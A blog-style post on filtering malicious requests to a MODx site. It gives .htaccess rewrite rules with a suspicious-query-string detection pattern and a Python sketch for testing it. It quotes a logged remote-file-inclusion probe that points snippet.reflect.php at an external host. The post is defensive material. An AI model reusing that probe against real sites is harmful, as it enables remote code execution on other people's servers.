From the moment I moved my site to a MODx platform, I began to observe an increase in the number of various scripts targeting it. I run my site on a self-configured and self-maintained server, which allows me to study every such script in detail.
The overwhelming majority of requests sent by malicious scripts simply result in an error document being sent. Sometimes, however, the scripts cause parse errors, which prompts me to study the source code and patch its weak spots. For the past two months, I have been highly satisfied with the server's ability to distinguish between erroneous requests from human users and requests from malicious scripts.
I have two error documents set up for my MODx site:
404-object-not-found <- a full-fledged page decorated with XHTML, CSS and graphics, sent when a human misspells the URL in the address bar
404-burp <- a document based on the "blank" template; its content is the single word "Burp!", and these five bytes are sent in response to malicious scripts (instead of, for example, 50-70 KB of full-featured XHTML/CSS that a non-human caller certainly will not appreciate).
Now for the most important part: the server has to analyze each request and decide which of the two kinds it is. Almost every well-designed MODx site takes advantage of the "mod_rewrite" module, and this is a great opportunity for such an analysis.
After activating the rewriting feature, you can include the following in the .htaccess file:
# handle invalid requests (human part)
ErrorDocument 403 http://sitedomain/404-object-not-found
ErrorDocument 404 http://sitedomain/404-object-not-found
# burp in response to malicious scripts
RewriteCond %{QUERY_STRING} (base(dir)?|(classes|lib)_dir|error|inhalt|page|path)=|root_dir|request|session|http:// [NC]
RewriteRule ^(.*)$ 404-burp? [R,L]
The RewriteCond pattern is the result of my observations of site access statistics and of the error and request logs. Malicious scripts attempt to accomplish their goals by sending unusual query strings. The server intercepts these strings and answers the entire request with four characters and an exclamation mark.
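Before deploying such a pattern, it can help to try it against query strings taken from your own logs. The following is only a rough sketch in Python, not part of the server setup: the function name is_suspicious and the sample strings "id=5" and "page=2" are my own illustrations, and Python's re module is assumed to behave like Apache's regex engine for a pattern this simple.

```python
import re

# Same pattern as in the RewriteCond above; re.IGNORECASE mirrors the [NC] flag.
SUSPICIOUS = re.compile(
    r"(base(dir)?|(classes|lib)_dir|error|inhalt|page|path)=|root_dir|request|session|http://",
    re.IGNORECASE,
)


def is_suspicious(query_string: str) -> bool:
    """Return True if the query string would trigger the redirect to 404-burp."""
    # re.search is unanchored, just like the unanchored RewriteCond pattern.
    return SUSPICIOUS.search(query_string) is not None


if __name__ == "__main__":
    samples = [
        # Query string of the Perl-script request quoted in this article.
        "reflect_base=http://sites.google.com/site/bsdcr3w/Home/prc.gif??",
        # Hypothetical harmless query string.
        "id=5",
        # Hypothetical pagination parameter; it matches the "page=" alternative.
        "page=2",
    ]
    for qs in samples:
        print(is_suspicious(qs), qs)
```

Note that "page=2" matches as well, so a site that uses a page parameter for legitimate navigation would probably have to drop that alternative from the pattern.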
We have no influence over who attempts to access our page (or what their intent is), but we can decide what the response will be. Example responses:
A human's mistake:
http://setpro.net.pl/misspelled
"Classic" probing of a MODx site, with the request sent from within a Perl script:
http://setpro.net.pl/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://sites.google.com/site/bsdcr3w/Home/prc.gif??